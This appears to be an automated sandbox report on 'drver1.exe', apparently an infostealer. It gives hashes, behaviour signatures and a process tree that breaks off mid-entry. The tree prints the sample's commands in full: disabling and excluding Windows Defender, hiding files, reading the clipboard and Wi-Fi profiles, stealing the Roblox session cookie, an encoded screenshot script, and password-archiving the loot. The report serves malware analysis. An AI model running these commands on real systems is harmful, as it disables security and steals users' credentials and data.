Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2025 21:58

General

  • Target

    drver1.exe

  • Size

    7.6MB

  • MD5

    2cefec82daba7accd05e00c2ba76273a

  • SHA1

    a82ffa1773ce621cc5e80decea213a437726aee8

  • SHA256

    f37a0f08cffa425c582cc2ee16d360ce6421e6e6bf2d8bf43715a154dabcdbae

  • SHA512

    7f81acc233695dbf7878968da6c267af5d7d8650b4ddfa8bc1e3bf883c19c6f6b3e2220be75a052b213e8a0d35a5948c60dbc786fb23b2b1ab39fac15f471f44

  • SSDEEP

    196608:eG1dewfI9jUCnORird1KfbLOYgN2oc+nBIdAx2:b5IHOQ76bynnBId

Malware Config

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\drver1.exe
    "C:\Users\Admin\AppData\Local\Temp\drver1.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1048
    • \??\c:\users\admin\appdata\local\temp\drver1.exe 
      c:\users\admin\appdata\local\temp\drver1.exe 
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:748
      • \??\c:\users\admin\appdata\local\temp\drver1.exe 
        c:\users\admin\appdata\local\temp\drver1.exe 
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2188
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\drver1.exe '"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\drver1.exe '
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3304
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:2752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success! Driver 1 loaded.', 0, 'Stage 1', 48+16);close()""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3444
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success! Driver 1 loaded.', 0, 'Stage 1', 48+16);close()"
            5⤵
              PID:2196
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\drver1.exe ""
            4⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3364
            • C:\Windows\system32\attrib.exe
              attrib +h +s "c:\users\admin\appdata\local\temp\drver1.exe "
              5⤵
              • Views/modifies file attributes
              PID:2184
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4188
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:1772
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:464
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3724
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1840
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4320
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4988
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3908
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
            4⤵
            • Clipboard Data
            PID:4124
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-Clipboard
              5⤵
              • Clipboard Data
              • Suspicious use of AdjustPrivilegeToken
              PID:4732
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
              PID:2204
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                5⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:4500
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              4⤵
                PID:4888
                • C:\Windows\system32\tree.com
                  tree /A /F
                  5⤵
                    PID:2912
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                  4⤵
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:2916
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show profile
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:4444
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "systeminfo"
                  4⤵
                    PID:3220
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      5⤵
                      • Gathers system information
                      PID:2460
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                    4⤵
                      PID:1036
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        5⤵
                          PID:2692
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        4⤵
                          PID:1516
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4688
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\odl2qg5n\odl2qg5n.cmdline"
                              6⤵
                                PID:3796
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D59.tmp" "c:\Users\Admin\AppData\Local\Temp\odl2qg5n\CSC2F7D2FD4C94445E087F973974C43ED18.TMP"
                                  7⤵
                                    PID:3036
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              4⤵
                                PID:5108
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  5⤵
                                    PID:3652
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  4⤵
                                    PID:3372
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      5⤵
                                        PID:4808
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      4⤵
                                        PID:2040
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          5⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:3164
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        4⤵
                                          PID:2648
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            5⤵
                                              PID:876
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                            4⤵
                                              PID:2676
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                5⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:4428
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              4⤵
                                                PID:1912
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  5⤵
                                                    PID:4544
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  4⤵
                                                    PID:628
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      5⤵
                                                      • Enumerates processes with tasklist
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2224
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    4⤵
                                                      PID:4236
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        5⤵
                                                          PID:3620
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                        4⤵
                                                          PID:4360
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1400
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          4⤵
                                                            PID:460
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              5⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1020
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                            4⤵
                                                              PID:3376
                                                              • C:\Windows\system32\getmac.exe
                                                                getmac
                                                                5⤵
                                                                  PID:3008
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI7482\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\2qKVl.zip" *"
                                                                4⤵
                                                                  PID:2432
                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7482\rar.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI7482\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\2qKVl.zip" *
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:1820
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                  4⤵
                                                                    PID:2584
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic os get Caption
                                                                      5⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:860
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                    4⤵
                                                                      PID:1520
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic computersystem get totalphysicalmemory
                                                                        5⤵
                                                                          PID:2896
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                        4⤵
                                                                          PID:2168
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic csproduct get uuid
                                                                            5⤵
                                                                              PID:2076
                                                                          • C:\Windows\system32\cmd.exe
